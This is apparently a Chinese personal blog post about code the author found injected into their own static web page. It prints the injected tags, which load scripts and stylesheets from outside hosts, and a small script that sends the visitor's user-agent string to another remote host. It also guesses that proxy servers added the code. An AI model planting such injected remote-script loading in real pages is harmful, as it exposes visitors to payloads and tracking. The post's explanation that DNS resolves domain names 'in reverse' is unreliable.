奇怪的木马
刚才访问我的一个网站时,发现网页被人嵌入了木马,嵌入的代码如下:
<script language=”javascript” src=”http://i.jsev.com./base.0394991501.js” mce_src=”http://i.jsev.com./base.0394991501.js”> </script>
<body bgcolor=”#FFFFCC” style=”font-family: Arial; font-size: 15px” onmousemove=”return fz3824();”>
<LINK REL=”stylesheet” TYPE=”text/css” HREF=”http://i.cssxx.com./base0394991502.css“>
<A HREF = “http://i.html.com./base0394991502.html”></A>
<SCRIPT LANGUAGE=”JAVASCRIPT” SRC=”http://i.js.com./base0394991502.js”></SCRIPT>
<SCRIPT LANGUAGE=”JAVASCRIPT”>
function getuseragnt()
{ var agt = navigator.userAgent.toLowerCase();
agt = agt.replace(/ /g, “”);
return agt;
}
document.write(”<LINK REL=’stylesheet’ TYPE=’text/css’ HREF=’http://i.css2js.com./base.css” + getuseragnt() + “_0394991502′>”)
</SCRIPT>
令人奇怪的是,这个网站我并没有真正开始做,整个网站只有一个静态的html文件,除了我自己也根本没有其它访客。是谁这么无聊做这么无意义的事情呢?赶快查看其它几个网站,发现并没有被种木马。
然后我又搜索i.js.com.,用Google搜没找到满意答案,用百度搜,根本没结果,用Live搜,全是不相干的结果,用搜狗搜,也是一条结果都没有,用有道搜,有两条相关结果,其中一条是百度知道的,真是奇怪,百度自己都没有抓取这个网页?却被有道抓取了,连Google都没有这条结果。用Yahoo搜,出来九条结果,都是相关的。由此可见搜索技术最强的还是Google和Yahoo,有道也很有潜力。
根据搜索的结果可以看到,被嵌入这段代码的人,全球似乎只有不到十个,我真荣幸,成为了其中一员。根据初步判断,原因可能是因为早上我使用了美国的几个代理服务器,代理服务器被人插入了这段代码,也可能是代理服务器判断我的IP来自中国,就给我加了这段代码,其中类似于http://i.js.com./这样的格式并非无效的,因为DNS解析的时候是反向的,会解析成.com.js.i,所以嵌入的java脚本是会执行的。
以上只是猜测,如果真是代理服务器的原因的话,看来以后用代理还真的得小心了。
